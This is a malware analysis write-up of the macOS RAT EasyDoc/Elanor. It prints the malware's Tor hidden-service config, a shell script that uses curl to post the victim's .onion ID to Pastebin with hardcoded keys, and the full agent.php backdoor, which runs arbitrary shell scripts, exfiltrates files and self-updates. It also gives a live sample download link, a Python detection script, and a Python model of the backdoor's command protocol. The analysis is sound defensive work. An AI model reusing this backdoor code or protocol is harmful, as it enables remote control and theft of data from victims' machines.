Comment on MacOSX/backdoor/RAT EasyDoc1.2 (aka Elanor)

There is a story going around about a new Mac OS X malware, EasyDoc1.2 (so-called Elanor), so I took a look. References:

+------------- start snip --------------+

https://www.macupdate.com/app/mac/56544/easydoc-converter

Sample: http://spacerunner.altervista.org/easydoc/EasyDoc1.2.zip (SHA256 f5df7d89f1bd6d6a8c3539320fc091f8dae3c9e3c25176c02392de2bb5ea9e19)

+------------- end snip --------------+

After fetching the samples I left comments on VirusTotal for each component, as per below:

+------------- start snip --------------+

https://www.virustotal.com/en/file/2c752b64069e9b078103adf8f5114281b7ce03f1ca7a995228f180140871999e/analysis/

https://www.virustotal.com/en/file/5dbbb91467e0f6e58497ae0c0c621a84a1f250bb856f3f9f139e70dedf1a32b7/analysis/

https://www.virustotal.com/en/file/5a61246c9fe8e52347e35664e0c86ab2897d807792008680e04306e6c2104941/analysis/

https://www.virustotal.com/en/file/885d3a1c7b62d4726ee2bb6039162487f49473220f5d6ef171c86c03b818bdda/analysis/1467856802/

https://www.virustotal.com/en/file/f257f2f97bf5cf9d7a0021046bb3d2a0b7cd16e38b152f6247c6e1f142864e52/analysis/

https://www.virustotal.com/en/file/d2f289edaf4dc88aa703645ce21948b7863e69d64fc3e5aaa5bb5c972fb3b395/analysis/

+------------- end snip --------------+

#### My analysis comment (read: rant) ####

I expected some native, savvy binaries for this RAT; instead, what I see is a super lame RAT!!!

The so-called "RAT" is a wrapper around various shell scripts, PHP scripts and open source applications, bundled together to form a "Tor web-based RAT".

Any skiddie could make this, and I won't be surprised if the builder of this RAT is a skiddo.

There is nothing special about this RAT EXCEPT that it was let into circulation as a legitimate app (see the MacUpdate listing referenced above), the reviewers having been fooled by the lame specs written by this app's coder/hacker.

#### Malware Package ####

Complete package: EasyDoc1.2.zip (SHA256 f5df7d89f1bd6d6a8c3539320fc091f8dae3c9e3c25176c02392de2bb5ea9e19)

#### Malware installer component ####

installer ("script"): https://www.virustotal.com/en/file/2c752b64069e9b078103adf8f5114281b7ce03f1ca7a995228f180140871999e/analysis/

This installer drops and registers the following three components (launch agent plist name and MD5 for each):

+------------- start snip --------------+

Tor hidden service : com.getdropbox.dropbox.integritycheck_orig.plist 23d0146a90a68970486ea84e4dc4a025

Pastebin Agent : com.getdropbox.dropbox.timegrabber_orig.plist f3b7b46b97a42c4a332e5115f1f93812

Web Service PHP : com.getdropbox.dropbox.usercontent_orig.plist 55321aee01a52050631ecc21140f7b69

+------------- end snip --------------+

*) This is a LOL: the PHP web service uses a plain default php.ini, simply renamed to "config": https://www.virustotal.com/en/file/d2f289edaf4dc88aa703645ce21948b7863e69d64fc3e5aaa5bb5c972fb3b395/analysis/

*) Note that the "dropbox" naming is bogus; it has nothing to do with the real Dropbox client and only serves to make the files and launch agents look familiar.

#### Malware "backdoor" ####

Backdoor1 (the Tor side, through which the panel is reached)

File: Library/.dropbox/sync/conn (MD5 0c3d62d6fc28d15b5c580a9617a9f4c5)

This is the component that connects the backdoor to Tor; its configuration is the "storage" file:

+------------- start snip --------------+

$ cat storage   (MD5 413F1F647240A02CF54B57CF270FEE17)
DirReqStatistics 0
GeoIPFile /Users/elle/Library/.dropbox/sync/data/list
GeoIPv6File /Users/elle/Library/.dropbox/sync/data/list6
HiddenServiceDir /Users/elle/Library/.dropbox/sync/hs
HiddenServicePort 80 127.0.0.1:9991
HiddenServicePort 22 127.0.0.1:9992
DataDirectory /Users/elle/Library/.dropbox/.rero
SOCKSPort 9060
ControlPort 9061

+------------- end snip --------------+

which is actually nothing but a plain torrc, the Tor project's own configuration file: it publishes a hidden service whose virtual ports 80 and 22 are forwarded to 127.0.0.1:9991 and 127.0.0.1:9992 on the victim, opens the SOCKS proxy on 9060 and the control port on 9061, and keeps Tor's state under the hidden ".rero" directory. Yes, it is open source.
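As an added example, not from the original post and not part of the malware, here is a Python triage script that checks a user's home directory for the artifacts listed in the installer section and in the "storage" torrc above: the hidden ~/Library/.dropbox tree, the hidden-service hostname, the launch agent plists, and the loopback ports named in the torrc. The LaunchAgents location and the installed plist names (without the "_orig" suffix the files carry inside the package) are my assumptions; the .onion name and the fake infected home it builds for testing are constructed.

```python
#!/usr/bin/env python3
"""Host triage for the EasyDoc/"Elanor" bundle (added example, not from the write-up).

Paths and plist names come from the analysis above; the LaunchAgents location and the
installed plist names (without "_orig") are assumptions.
"""
import os
import re
import socket
import tempfile

# Files dropped under ~/Library/.dropbox according to the analysis.
DROPPED_FILES = (
    "sync/conn",          # the Tor client, renamed
    "sync/storage",       # its torrc
    "sync/hs/hostname",   # .onion name of the hidden service
    "sync/data/list",     # GeoIP file referenced by the torrc
    ".rero",              # Tor DataDirectory
)

# Persistence: assumed to be installed in ~/Library/LaunchAgents without the "_orig" suffix.
LAUNCH_AGENTS = (
    "com.getdropbox.dropbox.integritycheck.plist",
    "com.getdropbox.dropbox.timegrabber.plist",
    "com.getdropbox.dropbox.usercontent.plist",
)

# Matches the local port in HiddenServicePort, SOCKSPort and ControlPort lines.
TORRC_PORT_RE = re.compile(
    r"^\s*(HiddenServicePort\s+\d+\s+127\.0\.0\.1:|SOCKSPort\s+|ControlPort\s+)(\d+)", re.M)


def torrc_local_ports(torrc_text):
    """Return the sorted 127.0.0.1 ports a torrc like "storage" binds or forwards to."""
    return sorted({int(m.group(2)) for m in TORRC_PORT_RE.finditer(torrc_text)})


def port_open(port, host="127.0.0.1", timeout=0.2):
    """True if something accepts TCP connections on host:port (live probe)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def triage(home, probe_ports=False):
    """Collect indicators for one user's home directory.

    Returns the dropped files found, the launch agents present, the .onion name,
    the loopback ports named in the torrc and, if probe_ports, which of them are open.
    """
    base = os.path.join(home, "Library", ".dropbox")
    found = {"files": [], "launch_agents": [], "torrc_ports": [], "open_ports": [], "onion": None}
    for rel in DROPPED_FILES:
        if os.path.exists(os.path.join(base, rel)):
            found["files"].append(rel)
    for name in LAUNCH_AGENTS:
        if os.path.exists(os.path.join(home, "Library", "LaunchAgents", name)):
            found["launch_agents"].append(name)
    storage = os.path.join(base, "sync", "storage")
    if os.path.isfile(storage):
        with open(storage, encoding="utf-8", errors="replace") as fh:
            found["torrc_ports"] = torrc_local_ports(fh.read())
    hostname = os.path.join(base, "sync", "hs", "hostname")
    if os.path.isfile(hostname):
        with open(hostname, encoding="utf-8", errors="replace") as fh:
            found["onion"] = fh.read().strip()
    if probe_ports:
        found["open_ports"] = [p for p in found["torrc_ports"] if port_open(p)]
    found["infected"] = bool(found["files"] or found["launch_agents"])
    return found


def build_fake_home():
    """Constructed infected home directory for offline testing; mirrors the torrc above."""
    root = tempfile.mkdtemp()
    sync = os.path.join(root, "Library", ".dropbox", "sync")
    os.makedirs(os.path.join(sync, "hs"))
    os.makedirs(os.path.join(root, "Library", ".dropbox", ".rero"))
    os.makedirs(os.path.join(root, "Library", "LaunchAgents"))
    open(os.path.join(sync, "conn"), "wb").close()
    with open(os.path.join(sync, "storage"), "w") as fh:
        fh.write("HiddenServiceDir %s/hs\nHiddenServicePort 80 127.0.0.1:9991\n"
                 "HiddenServicePort 22 127.0.0.1:9992\nSOCKSPort 9060\nControlPort 9061\n" % sync)
    with open(os.path.join(sync, "hs", "hostname"), "w") as fh:
        fh.write("abcdefghijklmnop.onion\n")   # constructed, not a real address
    open(os.path.join(root, "Library", "LaunchAgents", LAUNCH_AGENTS[1]), "w").close()
    return root


if __name__ == "__main__":
    import json
    print(json.dumps(triage(os.path.expanduser("~"), probe_ports=True), indent=2))
```

Run it as the user in question; with probe_ports=True it also reports whether the SOCKS/control ports and the two hidden-service back-ends are actually listening on 127.0.0.1, which separates a live infection from leftovers of a cleaned one.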

Another #facepalm is...

Backdoor2: shell.php, which is only an obfuscated copy of the well-known web-shell hacktool "b374k" (same kind of tool as WSO):

ref: https://github.com/b374k/b374k/blob/master/index.php

The hacker who made this app just added a link to galery.php, which shows the pics captured via wacaw (http://webcam-tools.sourceforge.net/), and this is open source too, FYI...

Backdoor3: a Pastebin uploader via the API.

Based on the Pastebin API sample code, it is a practically made-up script that ships the victim's identifier out the same way a formgrabber ships out credentials: it reads the .onion name of the hidden service (first label of sync/hs/hostname) and posts it as a private paste with hardcoded dev and user keys, so the operator can collect the list of infected hosts.

file: save https://www.virustotal.com/en/file/5dbbb91467e0f6e58497ae0c0c621a84a1f250bb856f3f9f139e70dedf1a32b7/analysis/

+------------- start snip --------------+

$ cat save
#!/bin/sh
USER=$(whoami)
if [ -e "/Users/$USER/Library/.dropbox/sync/hs/hostname" ]; then
    # first label of the .onion name of the victim's hidden service
    HOSTNAME=$(cat /Users/$USER/Library/.dropbox/sync/hs/hostname | cut -d '.' -f 1)
    echo "Hostname found: $HOSTNAME"
    echo "Saving hostname online..."
    # private paste (api_paste_private=2) under the operator's hardcoded keys
    curl -d "api_paste_code=$HOSTNAME&api_option=paste&api_dev_key=d1e52e9d2452e1810279527aa1a83c8b&api_paste_private=2&api_user_key=df8a73a0813c422465564c913e760d87" "http://pastebin.com/api/api_post.php"
    echo ""
else
    echo "Cannot find hostname value."
fi

+------------- end snip --------------+

Sample of the posted data (these are real pastes, searched for and collected from Pastebin; the link is encoded here and not shared in the clear):

aHR0cHM6Ly9wYXN0ZWJpbi5jb20vOFpEMFB6VHo=

Backdoor4: the remote control, which is... a PHP script.

File: agent.php https://www.virustotal.com/en/file/5a61246c9fe8e52347e35664e0c86ab2897d807792008680e04306e6c2104941/analysis/

It is the part reached through the Tor hidden service and supports four remote commands, selected by the methodName query parameter with the arguments as JSON in the POST body: getInfos (returns the .onion hostname as "uuid", the user name and the last update timestamp), executeShellScript (writes the supplied script to temp.sh and runs it with sh), getFile (returns any file under 2,000,000 bytes, base64-encoded) and update (writes a base64 zip to disk and extracts it over the agent's own directory). There is no authentication whatsoever; the reply is JSON with either "result" or a numeric "error" (-2 unknown or missing method, -3 missing parameter, 1 and 2 for failed operations).

+------------- start snip --------------+

<?php
// arguments come as JSON in the POST body, the command as ?methodName=
$request = json_decode(@file_get_contents('php://input'));
if(isset($_GET['methodName'])) {
    switch ($_GET['methodName']) {
        case 'getInfos':
            // the .onion name doubles as the victim id
            if(file_exists('sync/hs/hostname')) {
                $res['result']['uuid'] = file_get_contents('sync/hs/hostname');
            } else {
                $res['result']['uuid'] = 'tor error';
            }
            $res['result']['username'] = get_current_user();
            if(file_exists('timestamp')) {
                $res['result']['updateTimestamp'] = file_get_contents('timestamp');
            } else {
                $res['result']['updateTimestamp'] = '0';
            }
            break;
        case 'executeShellScript':
            // arbitrary shell script, written to temp.sh and run as the web service user
            if($request->script) {
                $script = '#!/bin/sh' . "\n" . $request->script . "\n";
                @file_put_contents('temp.sh', $script);
                if(file_exists('temp.sh')) {
                    $output = shell_exec('sh temp.sh');
                    unlink('temp.sh');
                    $res['result'] = $output;
                } else {
                    $res['error'] = 1;
                }
            } else {
                $res['error'] = -3;
            }
            break;
        case 'getFile':
            // exfiltrate any readable file under 2,000,000 bytes, base64 encoded
            if($request->path) {
                if(file_exists($request->path)) {
                    if(filesize($request->path) < 2000000) {
                        $hex = base64_encode(file_get_contents($request->path));
                        $res['result'] = $hex;
                    } else {
                        $res['error'] = 1;
                    }
                } else {
                    $res['error'] = 2;
                }
            } else {
                $res['error'] = -3;
            }
            break;
        case 'update':
            // drop a base64 zip and extract it over the agent's own directory
            if($request->timestamp && $request->data) {
                file_put_contents('update.zip', base64_decode($request->data));
                $zip = new ZipArchive;
                $zipRes = $zip->open('update.zip');
                if ($zipRes === TRUE) {
                    $zip->extractTo('./');
                    $zip->close();
                    $res['result'] = "true";
                    file_put_contents('timestamp', $request->timestamp);
                    shell_exec('rm -rf __MACOSX');
                } else {
                    $res['error'] = 1;
                }
                unlink('update.zip');
            } else {
                $res['error'] = -3;
            }
            break;
        default:
            $res['error'] = -2;
            break;
    }
} else {
    $res['error'] = -2;
}
@header('Content-Type: application/json');
echo json_encode($res);
?>

+------------- end snip --------------+
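To make the protocol concrete, here is an added Python model of that dispatch (my code, not the malware's and not from the original post): encode_request() builds what the controller sends, Agent.handle() reproduces the PHP switch against a throw-away directory, and demo() walks all four commands plus the error paths. The .onion hostname and the file delivered by the update command are constructed test data; the user name is approximated from the environment rather than from PHP's get_current_user().

```python
#!/usr/bin/env python3
"""Python model of the agent.php command protocol (added example, not the malware's code).

A controller request is "?methodName=X" plus a JSON POST body; the reply is JSON
with either "result" or a numeric "error". Agent.handle() mirrors the PHP switch.
"""
import base64
import io
import json
import os
import subprocess
import tempfile
import zipfile

GETFILE_LIMIT = 2000000   # agent.php: filesize must be < 2000000 bytes

# Error codes exactly as agent.php returns them.
ERR_OP_FAILED = 1         # write/extract failed, or file too large
ERR_NO_SUCH_FILE = 2
ERR_UNKNOWN_METHOD = -2   # also used when methodName is missing
ERR_MISSING_PARAM = -3


def encode_request(method, **params):
    """Controller side: the query string and the JSON body for one command."""
    return "methodName=" + method, json.dumps(params)


class Agent:
    """Agent side, rooted at one directory (the PHP works relative to its own cwd)."""

    def __init__(self, root):
        self.root = root

    def _p(self, rel):
        return os.path.join(self.root, rel)

    def _read(self, rel, default):
        return open(self._p(rel)).read() if os.path.exists(self._p(rel)) else default

    def handle(self, query, body):
        """Return the JSON reply agent.php would emit for this request."""
        params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
        req = json.loads(body) if body else {}
        method = params.get("methodName")
        res = {}
        if method == "getInfos":
            res["result"] = {"uuid": self._read("sync/hs/hostname", "tor error"),
                             "username": os.environ.get("USER", ""),  # PHP: get_current_user()
                             "updateTimestamp": self._read("timestamp", "0")}
        elif method == "executeShellScript":
            if req.get("script"):
                with open(self._p("temp.sh"), "w") as fh:
                    fh.write("#!/bin/sh\n" + req["script"] + "\n")
                out = subprocess.run(["sh", "temp.sh"], capture_output=True, text=True, cwd=self.root)
                os.unlink(self._p("temp.sh"))
                res["result"] = out.stdout                 # shell_exec() captures stdout only
            else:
                res["error"] = ERR_MISSING_PARAM
        elif method == "getFile":
            path = req.get("path")
            if not path:
                res["error"] = ERR_MISSING_PARAM
            elif not os.path.exists(path):
                res["error"] = ERR_NO_SUCH_FILE
            elif os.path.getsize(path) >= GETFILE_LIMIT:
                res["error"] = ERR_OP_FAILED
            else:
                with open(path, "rb") as fh:
                    res["result"] = base64.b64encode(fh.read()).decode()
        elif method == "update":
            if req.get("timestamp") and req.get("data"):
                try:
                    with zipfile.ZipFile(io.BytesIO(base64.b64decode(req["data"]))) as z:
                        z.extractall(self.root)            # PHP: $zip->extractTo('./')
                    with open(self._p("timestamp"), "w") as fh:
                        fh.write(str(req["timestamp"]))
                    res["result"] = "true"
                except zipfile.BadZipFile:
                    res["error"] = ERR_OP_FAILED
            else:
                res["error"] = ERR_MISSING_PARAM
        else:
            res["error"] = ERR_UNKNOWN_METHOD
        return json.dumps(res)


def make_update_zip(files):
    """Controller side: base64 zip of {name: bytes}, the payload of 'update'."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in files.items():
            z.writestr(name, data)
    return base64.b64encode(buf.getvalue()).decode()


def demo():
    """Walk all four commands, plus the error paths, against a throw-away agent dir."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "sync", "hs"))
    with open(os.path.join(root, "sync", "hs", "hostname"), "w") as fh:
        fh.write("constructedexample.onion\n")   # constructed, not a real hidden service
    agent = Agent(root)
    ask = lambda m, **kw: json.loads(agent.handle(*encode_request(m, **kw)))
    r = {"getInfos": ask("getInfos"),
         "bogus": ask("selfDestruct"),
         "noscript": ask("executeShellScript"),
         "shell": ask("executeShellScript", script="echo hello from agent"),
         "update": ask("update", timestamp=1467856802,
                       data=make_update_zip({"dropped.php": b"<?php // new component\n"})),
         "missing": ask("getFile", path=os.path.join(root, "nope"))}
    r["getFile"] = ask("getFile", path=os.path.join(root, "dropped.php"))
    r["getFile_decoded"] = base64.b64decode(r["getFile"]["result"]).decode()
    return r


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Two things the model makes plain: nothing in the exchange authenticates the controller, so anyone who learns the .onion name (which the Pastebin agent leaks on purpose) can drive the box, and update unpacks whatever zip the controller sends straight into the agent's own directory, which is how further components get added after infection.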

The last one, Backdoor5, is... a netcat (nc) binary, which, as you know too, is a perfectly good tool on its own.

#### Conclusion ####

This is it. So what is so special about this "RAT", except that it successfully wraps existing tools into one package for a malicious purpose and successfully fooled a software download site (the MacUpdate listing above) into carrying it? :-)

#MalwareMustDie